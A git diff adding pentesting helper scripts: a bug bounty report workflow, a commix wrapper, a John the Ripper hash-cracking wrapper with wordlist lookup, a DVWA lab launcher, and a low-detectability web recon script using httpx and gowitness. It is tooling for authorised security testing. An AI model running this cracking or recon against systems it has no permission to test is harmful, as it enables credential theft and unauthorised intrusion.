local json_file="$program_dir/discoveries/${vuln_id}.json"
|
||||
local pdf_file="$program_dir/reports/${vuln_id}.pdf"
|
||||
|
||||
if [[ ! -f "$json_file" ]]; then
|
||||
echo -e "${RED}[-] JSON file not found: $json_file${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BLUE}[+] Generating PDF report...${NC}"
|
||||
|
||||
cd "$TEMPLATE_DIR"
|
||||
bun run latex/generate.ts "$json_file" "$pdf_file"
|
||||
|
||||
if [[ -f "$pdf_file" ]]; then
|
||||
echo -e "${GREEN}[✓] Report generated: $pdf_file${NC}"
|
||||
echo -e "${YELLOW}[!] Review before submitting!${NC}"
|
||||
|
||||
# Open PDF (if on desktop with xdg-open)
|
||||
if command -v xdg-open &> /dev/null; then
|
||||
xdg-open "$pdf_file" &
|
||||
fi
|
||||
else
|
||||
echo -e "${RED}[-] Report generation failed${NC}"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
show_status() {
|
||||
local program="$1"
|
||||
local program_dir="$BB_ROOT/$program"
|
||||
|
||||
if [[ ! -d "$program_dir" ]]; then
|
||||
echo -e "${RED}[-] Program not found: $program${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BLUE}=== Bug Bounty Program Status ===${NC}"
|
||||
echo ""
|
||||
cat "$program_dir/info.txt"
|
||||
echo ""
|
||||
echo -e "${BLUE}=== Findings ===${NC}"
|
||||
|
||||
local findings=$(find "$program_dir/discoveries" -name "*.json" -not -name ".gitkeep" | wc -l)
|
||||
local reports=$(find "$program_dir/reports" -name "*.pdf" | wc -l)
|
||||
|
||||
echo "Total findings: $findings"
|
||||
echo "Generated reports: $reports"
|
||||
|
||||
if [[ $findings -gt 0 ]]; then
|
||||
echo ""
|
||||
echo "Discoveries:"
|
||||
ls -1 "$program_dir/discoveries/"*.json 2>/dev/null | xargs -n1 basename || true
|
||||
fi
|
||||
}
|
||||
|
||||
# Main command router
|
||||
case "${1:-}" in
|
||||
init)
|
||||
[[ -z "${2:-}" ]] || [[ -z "${3:-}" ]] && show_usage && exit 1
|
||||
init_program "$2" "$3"
|
||||
;;
|
||||
recon)
|
||||
[[ -z "${2:-}" ]] && show_usage && exit 1
|
||||
run_recon "$2"
|
||||
;;
|
||||
test)
|
||||
[[ -z "${2:-}" ]] || [[ -z "${3:-}" ]] || [[ -z "${4:-}" ]] && show_usage && exit 1
|
||||
quick_test "$2" "$3" "$4"
|
||||
;;
|
||||
screenshot|ss)
|
||||
[[ -z "${2:-}" ]] && show_usage && exit 1
|
||||
take_screenshot "$2" "${3:-evidence}"
|
||||
;;
|
||||
report)
|
||||
[[ -z "${2:-}" ]] || [[ -z "${3:-}" ]] && show_usage && exit 1
|
||||
generate_report "$2" "$3"
|
||||
;;
|
||||
status)
|
||||
[[ -z "${2:-}" ]] && show_usage && exit 1
|
||||
show_status "$2"
|
||||
;;
|
||||
*)
|
||||
show_usage
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
14
scripts/pentesting/commix
Executable file
14
scripts/pentesting/commix
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
#!/usr/bin/env bash
|
||||
# Wrapper for commix (command injection testing tool)
|
||||
# Routes to the correct commix installation
|
||||
|
||||
COMMIX_PATH="/home/e/commix/commix.py"
|
||||
|
||||
if [[ ! -f "$COMMIX_PATH" ]]; then
|
||||
echo "Error: commix not found at $COMMIX_PATH" >&2
|
||||
echo "Install with: git clone https://github.com/commixproject/commix.git /home/e/commix" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Execute commix with python3
|
||||
exec python3 "$COMMIX_PATH" "$@"
|
||||
274
scripts/pentesting/crack
Executable file
274
scripts/pentesting/crack
Executable file
|
|
@ -0,0 +1,274 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: crack
|
||||
# Description: Hash cracking helper (john/hashcat wrapper)
|
||||
# Usage: crack <hashfile> # Auto-detect and crack
|
||||
# crack <hashfile> -w wordlist # Specify wordlist
|
||||
# crack <hashfile> -m md5 # Specify hash type
|
||||
# crack identify <hash> # Identify hash type
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}crack${NC} - Hash Cracking Helper v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " crack <hashfile> [OPTIONS]"
|
||||
echo " crack identify <hash>"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}crack <file>${NC} Crack hashes in file"
|
||||
echo -e " ${CYAN}identify <hash>${NC} Identify hash type"
|
||||
echo -e " ${CYAN}show <file>${NC} Show cracked passwords"
|
||||
echo
|
||||
echo -e "${BOLD}OPTIONS:${NC}"
|
||||
echo -e " ${CYAN}-w, --wordlist FILE${NC} Specify wordlist"
|
||||
echo -e " ${CYAN}-m, --mode TYPE${NC} Hash type (md5, sha1, sha256, ntlm, etc.)"
|
||||
echo -e " ${CYAN}-r, --rules${NC} Apply John rules"
|
||||
echo -e " ${CYAN}-f, --format${NC} John format string"
|
||||
echo -e " ${CYAN}-h, --help${NC} Show this help"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " crack hashes.txt # Auto crack with default wordlist"
|
||||
echo " crack hashes.txt -w rockyou.txt # Use specific wordlist"
|
||||
echo " crack hashes.txt -m md5 # Specify MD5 hashes"
|
||||
echo " crack identify 5f4dcc3b5aa765d61d8327deb882cf99"
|
||||
echo " crack show hashes.txt # Show cracked results"
|
||||
echo
|
||||
echo -e "${BOLD}COMMON HASH TYPES:${NC}"
|
||||
echo " md5, sha1, sha256, sha512"
|
||||
echo " ntlm, mssql, mysql"
|
||||
echo " bcrypt, des, raw-md5"
|
||||
echo
|
||||
echo -e "${BOLD}INSTALLED TOOLS:${NC}"
|
||||
command -v john &>/dev/null && echo -e " ${GREEN}✓${NC} john (John the Ripper)" || echo -e " ${RED}✗${NC} john (install: sudo apt install john)"
|
||||
command -v hashcat &>/dev/null && echo -e " ${GREEN}✓${NC} hashcat" || echo -e " ${RED}✗${NC} hashcat (install: sudo apt install hashcat)"
|
||||
command -v hashid &>/dev/null && echo -e " ${GREEN}✓${NC} hashid (hash identifier)" || echo -e " ${RED}✗${NC} hashid (install: pip install hashid)"
|
||||
}
|
||||
|
||||
# Detect available tools
|
||||
get_cracker() {
|
||||
if command -v john &>/dev/null; then
|
||||
echo "john"
|
||||
elif command -v hashcat &>/dev/null; then
|
||||
echo "hashcat"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} No hash cracker found" >&2
|
||||
echo "Install one: sudo apt install john hashcat" >&2
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Identify hash type
|
||||
identify_hash() {
|
||||
local hash="$1"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Identifying hash: ${BOLD}$hash${NC}"
|
||||
echo
|
||||
|
||||
if command -v hashid &>/dev/null; then
|
||||
hashid "$hash"
|
||||
else
|
||||
# Manual identification based on length
|
||||
local len=${#hash}
|
||||
|
||||
echo -e "${YELLOW}Hash Identification:${NC}"
|
||||
case "$len" in
|
||||
32)
|
||||
echo " Possible: MD5, NTLM"
|
||||
echo " John format: --format=raw-md5 or --format=nt"
|
||||
echo " Hashcat mode: -m 0 (MD5) or -m 1000 (NTLM)"
|
||||
;;
|
||||
40)
|
||||
echo " Possible: SHA1"
|
||||
echo " John format: --format=raw-sha1"
|
||||
echo " Hashcat mode: -m 100"
|
||||
;;
|
||||
64)
|
||||
echo " Possible: SHA256, SHA3-256"
|
||||
echo " John format: --format=raw-sha256"
|
||||
echo " Hashcat mode: -m 1400"
|
||||
;;
|
||||
128)
|
||||
echo " Possible: SHA512"
|
||||
echo " John format: --format=raw-sha512"
|
||||
echo " Hashcat mode: -m 1700"
|
||||
;;
|
||||
60)
|
||||
if [[ "$hash" =~ ^\$2[ayb]\$ ]]; then
|
||||
echo " Identified: bcrypt"
|
||||
echo " John format: --format=bcrypt"
|
||||
echo " Hashcat mode: -m 3200"
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo " Unknown hash type (length: $len)"
|
||||
echo " Try: hashid '$hash'"
|
||||
;;
|
||||
esac
|
||||
fi
|
||||
}
|
||||
|
||||
# Find common wordlists
|
||||
find_wordlist() {
|
||||
local wordlists=(
|
||||
"/usr/share/wordlists/rockyou.txt"
|
||||
"/usr/share/wordlists/rockyou.txt.gz"
|
||||
"/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt"
|
||||
"/usr/share/dict/words"
|
||||
)
|
||||
|
||||
for wordlist in "${wordlists[@]}"; do
|
||||
if [[ -f "$wordlist" ]]; then
|
||||
echo "$wordlist"
|
||||
return 0
|
||||
fi
|
||||
done
|
||||
|
||||
echo ""
|
||||
}
|
||||
|
||||
# Crack with John the Ripper
|
||||
crack_john() {
|
||||
local hashfile="$1"
|
||||
local format="${2:-}"
|
||||
local wordlist="${3:-}"
|
||||
local rules="${4:-false}"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Using John the Ripper"
|
||||
echo -e "${CYAN}[*]${NC} Hash file: $hashfile"
|
||||
|
||||
local john_args=""
|
||||
|
||||
if [[ -n "$format" ]]; then
|
||||
john_args="$john_args --format=$format"
|
||||
echo -e "${CYAN}[*]${NC} Format: $format"
|
||||
fi
|
||||
|
||||
if [[ -n "$wordlist" ]]; then
|
||||
if [[ "$wordlist" == *.gz ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Wordlist: $wordlist (gzipped)"
|
||||
john_args="$john_args --wordlist=<(zcat $wordlist)"
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Wordlist: $wordlist"
|
||||
john_args="$john_args --wordlist=$wordlist"
|
||||
fi
|
||||
else
|
||||
auto_wordlist=$(find_wordlist)
|
||||
if [[ -n "$auto_wordlist" ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Using default wordlist: $auto_wordlist"
|
||||
john_args="$john_args --wordlist=$auto_wordlist"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [[ "$rules" == "true" ]]; then
|
||||
john_args="$john_args --rules"
|
||||
echo -e "${CYAN}[*]${NC} Rules: enabled"
|
||||
fi
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}[*]${NC} Starting crack..."
|
||||
echo
|
||||
|
||||
john $john_args "$hashfile"
|
||||
}
|
||||
|
||||
# Show cracked passwords
|
||||
show_cracked() {
|
||||
local hashfile="$1"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Cracked passwords for: ${BOLD}$hashfile${NC}"
|
||||
echo
|
||||
|
||||
if command -v john &>/dev/null; then
|
||||
john --show "$hashfile"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} John not available"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
command="$1"
|
||||
shift
|
||||
|
||||
case "$command" in
|
||||
identify|id)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: crack identify <hash>"
|
||||
exit 1
|
||||
fi
|
||||
identify_hash "$1"
|
||||
;;
|
||||
show)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: crack show <hashfile>"
|
||||
exit 1
|
||||
fi
|
||||
show_cracked "$1"
|
||||
;;
|
||||
*)
|
||||
# Assume first arg is hashfile
|
||||
hashfile="$command"
|
||||
|
||||
if [[ ! -f "$hashfile" ]]; then
|
||||
echo -e "${RED}Error:${NC} Hash file not found: $hashfile"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Parse crack options
|
||||
format=""
|
||||
wordlist=""
|
||||
rules=false
|
||||
|
||||
while [[ $# -gt 0 ]]; do
|
||||
case $1 in
|
||||
-w|--wordlist)
|
||||
wordlist="$2"
|
||||
shift 2
|
||||
;;
|
||||
-m|--mode|-f|--format)
|
||||
format="$2"
|
||||
shift 2
|
||||
;;
|
||||
-r|--rules)
|
||||
rules=true
|
||||
shift
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown option: $1"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
cracker=$(get_cracker)
|
||||
|
||||
case "$cracker" in
|
||||
john)
|
||||
crack_john "$hashfile" "$format" "$wordlist" "$rules"
|
||||
;;
|
||||
hashcat)
|
||||
echo -e "${YELLOW}⚠${NC} Hashcat support not yet implemented"
|
||||
echo "Use John the Ripper or implement hashcat wrapper"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
;;
|
||||
esac
|
||||
184
scripts/pentesting/dvwa
Executable file
184
scripts/pentesting/dvwa
Executable file
|
|
@ -0,0 +1,184 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: dvwa
|
||||
# Description: Damn Vulnerable Web Application launcher
|
||||
# Usage: dvwa start|stop|status|logs
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
CONTAINER_NAME="dvwa"
|
||||
IMAGE="vulnerables/web-dvwa"
|
||||
DEFAULT_PORT="8080"
|
||||
|
||||
# Find available port
|
||||
find_available_port() {
|
||||
local port="${1:-8080}"
|
||||
while lsof -Pi :$port -sTCP:LISTEN -t >/dev/null 2>&1 || sudo netstat -tuln | grep -q ":$port "; do
|
||||
echo -e "${YELLOW}⚠${NC} Port $port in use, trying next..." >&2
|
||||
port=$((port + 1))
|
||||
done
|
||||
echo "$port"
|
||||
}
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}dvwa${NC} - DVWA Launcher v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " dvwa <command>"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}start${NC} Start DVWA"
|
||||
echo -e " ${CYAN}stop${NC} Stop DVWA"
|
||||
echo -e " ${CYAN}restart${NC} Restart DVWA"
|
||||
echo -e " ${CYAN}status${NC} Check if running"
|
||||
echo -e " ${CYAN}logs${NC} Show container logs"
|
||||
echo -e " ${CYAN}shell${NC} Open shell in container"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " dvwa start # Launch DVWA"
|
||||
echo " dvwa stop # Stop DVWA"
|
||||
echo " dvwa logs # View logs"
|
||||
echo
|
||||
echo -e "${BOLD}ACCESS:${NC}"
|
||||
echo " URL: ${BOLD}http://localhost:\$PORT${NC} (default: 8080, auto-detects if in use)"
|
||||
echo " Username: ${BOLD}admin${NC}"
|
||||
echo " Password: ${BOLD}password${NC}"
|
||||
echo
|
||||
echo -e "${BOLD}SETUP:${NC}"
|
||||
echo " 1. Navigate to http://localhost"
|
||||
echo " 2. Click 'Create / Reset Database' button"
|
||||
echo " 3. Login with admin/password"
|
||||
echo " 4. Set Security Level (low/medium/high/impossible)"
|
||||
echo
|
||||
echo -e "${BOLD}ABOUT:${NC}"
|
||||
echo " DVWA - Damn Vulnerable Web Application"
|
||||
echo " Perfect for testing: SQLi, XSS, CSRF, Command Injection, etc."
|
||||
echo " Docs: https://github.com/digininja/DVWA"
|
||||
}
|
||||
|
||||
check_docker() {
|
||||
if ! command -v docker &>/dev/null; then
|
||||
echo -e "${RED}Error:${NC} Docker not installed"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
start_dvwa() {
|
||||
# Find available port only when starting
|
||||
PORT=$(find_available_port "$DEFAULT_PORT")
|
||||
|
||||
if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${YELLOW}⚠${NC} DVWA already running"
|
||||
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 80 2>/dev/null | cut -d: -f2)
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||
return 0
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Starting existing container..."
|
||||
docker start "$CONTAINER_NAME"
|
||||
fi
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Pulling ${IMAGE}..."
|
||||
docker pull "$IMAGE"
|
||||
echo -e "${CYAN}[*]${NC} Starting DVWA..."
|
||||
docker run -d --name "$CONTAINER_NAME" -p "${PORT}:80" "$IMAGE"
|
||||
fi
|
||||
|
||||
echo -e "${GREEN}✓${NC} DVWA started"
|
||||
if [[ "$PORT" != "$DEFAULT_PORT" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Using port ${PORT} (default ${DEFAULT_PORT} was in use)"
|
||||
fi
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${PORT}${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Login: ${BOLD}admin / password${NC}"
|
||||
echo
|
||||
echo -e "${YELLOW}Note:${NC} First time? Click 'Create / Reset Database' at the bottom"
|
||||
}
|
||||
|
||||
stop_dvwa() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${CYAN}[*]${NC} Stopping DVWA..."
|
||||
docker stop "$CONTAINER_NAME"
|
||||
echo -e "${GREEN}✓${NC} DVWA stopped"
|
||||
else
|
||||
echo -e "${YELLOW}⚠${NC} DVWA not running"
|
||||
fi
|
||||
}
|
||||
|
||||
restart_dvwa() {
|
||||
stop_dvwa
|
||||
sleep 2
|
||||
start_dvwa
|
||||
}
|
||||
|
||||
show_status() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${GREEN}●${NC} DVWA is ${GREEN}running${NC}"
|
||||
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 80 2>/dev/null | cut -d: -f2)
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Login: ${BOLD}admin / password${NC}"
|
||||
docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
|
||||
else
|
||||
echo -e "${RED}●${NC} DVWA is ${RED}stopped${NC}"
|
||||
fi
|
||||
}
|
||||
|
||||
show_logs() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
docker logs -f "$CONTAINER_NAME"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} DVWA not running"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
open_shell() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
docker exec -it "$CONTAINER_NAME" /bin/bash
|
||||
else
|
||||
echo -e "${RED}Error:${NC} DVWA not running"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Main
|
||||
check_docker
|
||||
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
case "$1" in
|
||||
start|up)
|
||||
start_dvwa
|
||||
;;
|
||||
stop|down)
|
||||
stop_dvwa
|
||||
;;
|
||||
restart)
|
||||
restart_dvwa
|
||||
;;
|
||||
status)
|
||||
show_status
|
||||
;;
|
||||
logs)
|
||||
show_logs
|
||||
;;
|
||||
shell|sh|bash)
|
||||
open_shell
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown command: $1"
|
||||
echo "Run 'dvwa --help' for usage"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
233
scripts/pentesting/light-recon
Executable file
233
scripts/pentesting/light-recon
Executable file
|
|
@ -0,0 +1,233 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: light-recon
|
||||
# Description: Light web reconnaissance (browser-like, low detectability)
|
||||
# Usage: light-recon <url>
|
||||
# Tier 2: Between passive and active - mimics normal browsing
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}light-recon${NC} - Light Web Reconnaissance v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " light-recon <url>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Browser-like reconnaissance with low detectability"
|
||||
echo " Creates tmux window with 3 panes:"
|
||||
echo " - Pane 1 (left): httpx (HTTP probing with tech detection)"
|
||||
echo " - Pane 2 (top-right): gowitness (visual screenshots)"
|
||||
echo " - Pane 3 (bottom-right): results dashboard"
|
||||
echo
|
||||
echo -e "${BOLD}WHAT IS LIGHT RECON?${NC}"
|
||||
echo " ✓ HTTP/HTTPS probing (looks like normal browser request)"
|
||||
echo " ✓ Screenshot capture (headless browser)"
|
||||
echo " ✓ Technology fingerprinting (Wappalyzer-style)"
|
||||
echo " ✓ Security headers analysis"
|
||||
echo " ✓ SSL/TLS information"
|
||||
echo " ✓ Redirect chain following"
|
||||
echo
|
||||
echo " ✗ No directory brute-forcing"
|
||||
echo " ✗ No vulnerability scanning"
|
||||
echo " ✗ No aggressive crawling"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " light-recon http://target.htb"
|
||||
echo " light-recon https://example.com"
|
||||
echo " light-recon 10.10.10.5"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./light-recon-<target>-<timestamp>/"
|
||||
echo
|
||||
echo -e "${BOLD}DETECTABILITY:${NC}"
|
||||
echo " 🟡 Low - Appears as normal browser traffic"
|
||||
echo " Safe for bug bounty initial recon phase"
|
||||
echo " Use before aggressive scanning (web-recon)"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
local optional_missing=()
|
||||
|
||||
# Core tools
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
|
||||
# Light recon tools (all optional but warn)
|
||||
command -v httpx &>/dev/null || optional_missing+=("httpx")
|
||||
command -v gowitness &>/dev/null || optional_missing+=("gowitness")
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||
echo -e "${CYAN}Install with:${NC}"
|
||||
for tool in "${optional_missing[@]}"; do
|
||||
case "$tool" in
|
||||
httpx) echo " go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest" ;;
|
||||
gowitness) echo " go install github.com/sensepost/gowitness@latest" ;;
|
||||
esac
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir() {
|
||||
local url="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
OUTPUT_DIR="light-recon-${clean_url}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
mkdir -p "$OUTPUT_DIR/screenshots"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Main light-recon function
|
||||
run_light_recon() {
|
||||
local url="$1"
|
||||
|
||||
# Ensure URL has http:// or https://
|
||||
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||
url="http://$url"
|
||||
echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Light Web Reconnaissance (Browser-Like) ║"
|
||||
echo "║ Target: $url"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$url"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||
run_scans_sequential "$url"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window with 3 panes
|
||||
WINDOW_NAME="--> Light: ${url:0:20}... <--"
|
||||
tmux new-window -n "$WINDOW_NAME"
|
||||
|
||||
# Create layout: [Left wide] [Right split top/bottom]
|
||||
# With 3 panes, tmux uses different numbering than 4-pane layouts
|
||||
# After splits: [0: left-wide] [1: top-right] [2: bottom-right]
|
||||
|
||||
# Split horizontally (left | right)
|
||||
tmux split-window -h
|
||||
|
||||
# Split right pane vertically
|
||||
tmux select-pane -t 1
|
||||
tmux split-window -v
|
||||
|
||||
# Resize left pane to be wider (60/40 split)
|
||||
tmux select-pane -t 0
|
||||
tmux resize-pane -R 30
|
||||
|
||||
# Final 3-pane layout:
|
||||
# 0 (left-wide) 1 (top-right)
|
||||
# 2 (bottom-right)
|
||||
|
||||
# Pane 0 (left): httpx - comprehensive HTTP probing
|
||||
tmux select-pane -t 0
|
||||
if command -v httpx &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting httpx HTTP probing...${NC}' && echo '$url' | httpx -silent -title -tech-detect -status-code -content-length -web-server -method -ip -cname -cdn -follow-redirects -tls-probe -pipeline -json -o httpx-detailed.json 2>&1 | tee httpx.log && echo '$url' | httpx -silent -sc -title -tech-detect -web-server -ip -location -cdn -o httpx-summary.txt && echo -e '${GREEN}✓ httpx complete${NC}' && echo && echo -e '${CYAN}Summary:${NC}' && cat httpx-summary.txt" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ httpx not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 1 (top-right): gowitness - screenshot capture
|
||||
tmux select-pane -t 1
|
||||
if command -v gowitness &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting gowitness screenshot capture...${NC}' && gowitness single '$url' --screenshot-path=./screenshots/ --disable-logging --timeout 30 2>&1 | tee gowitness.log && echo -e '${GREEN}✓ gowitness complete${NC}' && echo && ls -lh screenshots/ | tail -5" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ gowitness not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 2 (bottom-right): Live results dashboard
|
||||
tmux select-pane -t 2
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIGHT RECON RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}HTTP Probing (httpx):${NC}'; [ -f httpx-summary.txt ] && [ -s httpx-summary.txt ] && cat httpx-summary.txt || echo ' Waiting...'; echo; echo -e '${GREEN}Screenshots (gowitness):${NC}'; [ -d screenshots ] && SCREENSHOT_COUNT=\$(ls -1 screenshots/*.png 2>/dev/null | wc -l) && echo \" Captured: \$SCREENSHOT_COUNT screenshot(s)\" && ls -1 screenshots/*.png 2>/dev/null | head -3 || echo ' Waiting...'; echo; echo -e '${GREEN}Technology Detection:${NC}'; [ -f httpx-detailed.json ] && [ -s httpx-detailed.json ] && jq -r '.tech[]' httpx-detailed.json 2>/dev/null | sort -u | sed 's/^/ - /' | head -10 || echo ' Waiting...'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 5; done" C-m
|
||||
|
||||
# Focus back on httpx pane
|
||||
tmux select-pane -t 0
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux light-recon window created"
|
||||
